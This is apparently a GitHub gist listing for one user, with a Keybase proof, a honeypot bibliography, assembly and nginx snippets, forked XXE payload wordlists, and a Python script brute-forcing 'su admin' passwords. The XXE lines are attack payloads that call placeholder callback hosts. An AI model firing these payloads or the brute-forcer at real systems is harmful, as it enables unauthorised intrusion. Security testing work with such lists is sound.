I hereby claim:
- I am whoismath on github.
- I am vrechson (https://keybase.io/vrechson) on keybase.
- I have a public key whose fingerprint is ECC9 E966 EA34 0775 F9CF 6EFD 146E 86D7 FD68 F6DF
To claim this, I am signing this object:
Matheus Vrech vrechson
vrechson
/ xxe-payloads.txt
Created
April 25, 2023 19:15
— forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
vrechson
/ XXE_payloads
Created
March 16, 2023 00:12
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
vrechson
/ keybase.md
Created
June 6, 2019 03:48
vrechson
/ abntex2-modelo-references
Created
April 19, 2019 21:37
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %% This BibTeX bibliography file was created using BibDesk. | |
| %% http://bibdesk.sourceforge.net/ | |
| %% Saved with string encoding Unicode (UTF-8) | |
| %% Honeypots | |
| @inproceedings{kuwatly2004dynamic, | |
| title={A dynamic honeypot design for intrusion detection}, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| INCLUDE Irvine32.inc | |
| POINT STRUCT | |
| X BYTE 0 | |
| Y BYTE 0 | |
| POINT ENDS | |
| .data |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import pexpect | |
| import multiprocessing | |
| import sys | |
| def trypass(password): | |
| COMMAND_PROMPT = '[$#] ' | |
| WRONGPASS1 = 'Sorry.' | |
| WRONGPASS2 = 'su: incorrect password' | |
| child = pexpect.spawn('/bin/su admin') |
vrechson
/ gist:80a271056869a4e66abe53baa0832c96
Created
January 4, 2018 01:57
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #user nobody; | |
| worker_processes 2; | |
| #error_log logs/error.log; | |
| #error_log logs/error.log notice; | |
| #error_log logs/error.log info; | |
| error_log /dev/null; | |
| pid logs/nginx.pid; |